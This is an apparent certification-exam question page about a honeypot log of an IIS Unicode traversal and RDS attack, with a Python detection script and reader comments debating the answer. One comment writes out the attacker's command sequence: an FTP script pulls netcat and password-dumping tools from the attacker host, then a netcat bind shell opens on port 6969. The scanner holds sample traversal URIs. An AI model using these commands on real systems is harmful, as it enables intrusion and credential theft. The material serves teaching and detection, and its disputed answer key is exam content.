What can you infer from the exploit given?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious
user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS
server. He does a quick query to discover that the directory exists, and a query to msadcs.dll
shows that it is functioning correctly. The attacker then makes an RDS query that results in the
commands run as shown below:

What can you infer from the exploit given?

A.
It is a local exploit where the attacker logs in using username johna2k.

B.
There are two attackers on the system – johna2k and haxedj00.

C.
The attack is a remote exploit and the hacker downloads three files.

D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
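The question describes two request patterns a detection engine such as the Snort sensor on this honeypot would key on: overlong Unicode encodings used to traverse out of the scripts directory into cmd.exe, and requests to msadcs.dll that indicate RDS probing. As an added illustration, not part of the original question, the script below runs that detection over a handful of constructed IIS-style log lines (the lines are invented for the example; the attacker address is the one the question names, the paths and timestamps are assumptions). The decoder is general: it turns any %c0xx/%c1xx pair back into the 7-bit character it encodes, since 0xC0 and 0xC1 can never lead a valid UTF-8 sequence.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the W3C extended format IIS writes
# (date time client-ip method uri-stem uri-query status). They are
# illustrative only, not the lab.wiretrip.net honeypot log itself.
SAMPLE_LOG = """\
2000-11-01 10:12:03 213.116.251.162 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-11-01 10:12:08 213.116.251.162 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+type+c:\\boot.ini 200
2000-11-01 10:12:15 213.116.251.162 GET /msadc/msadcs.dll - 200
2000-11-01 10:12:21 213.116.251.162 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200
2000-11-01 10:13:00 10.0.0.5 GET /index.htm - 200
"""

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)
# 0xC0 and 0xC1 can never start a valid UTF-8 sequence, so any %c0%xx or
# %c1%xx pair is an overlong encoding of a 7-bit character (e.g. %c0%af
# for "/"), which is what the IIS Unicode canonicalization bypass relies on.
OVERLONG_RE = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
INTERPRETER_RE = re.compile(r"/cmd1?\.exe$", re.IGNORECASE)
RDS_RE = re.compile(r"/msadcs\.dll(/|$)", re.IGNORECASE)


def canonicalize(raw):
    """Decode overlong %c0/%c1 pairs to the ASCII they stand for, then percent-decode."""
    def overlong(m):
        lead, cont = int(m.group(1), 16), int(m.group(2), 16)
        return chr(((lead & 0x1F) << 6) | (cont & 0x3F))
    return unquote(OVERLONG_RE.sub(overlong, raw))


def classify(stem):
    """Return the list of indicators found in one request path."""
    tags = []
    canonical = canonicalize(stem)
    if OVERLONG_RE.search(stem):
        tags.append("overlong-utf8")
    if TRAVERSAL_RE.search(canonical):
        tags.append("traversal")
    if INTERPRETER_RE.search(canonical):
        tags.append("command-interpreter")
    if RDS_RE.search(canonical):
        tags.append("rds-msadcs")
    return tags


def scan(log_text):
    """Return one finding per suspicious request: (client ip, canonical path, tags)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("stem"))
        if tags:
            findings.append((m.group("ip"), canonicalize(m.group("stem")), tags))
    return findings


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(f"{ip:16} {','.join(tags):45} {path}")
```

Matching on the canonical form rather than the raw URL is the point: a filter that only looks for the literal string "../" misses the request entirely, which is exactly the gap the Unicode attack exploits.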




miguel

C.
The attack is a remote exploit and the hacker downloads TWO files.

HuHai

D.
The last line ‘cmd1.exe /c nc -l -p 6969 -e cmd1.exe’ is using TCP, not UDP.
Look at ‘cmd1.exe /c echo get samdump.dll >>ftpcom’ that the hacker ran on the remote victim.
The hacker transfers the file ‘samdump.dll’ to the victim; that is an upload.

Bill

This question is missing a line. This is what it is supposed to look like so it does show 3 files. The one on this page only has 2. The answer on the exam will be C and it will have 3 files.

“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get pdump.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 -e cmd1.exe”

What can you infer from the exploit given?

A.
It is a local exploit where the attacker logs in using username johna2k

B.
There are two attackers on the system – johna2k and haxedj00

C.
The attack is a remote exploit and the hacker downloads three files

D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Mike

Thanks Bill. Thought this question might actually be wrong.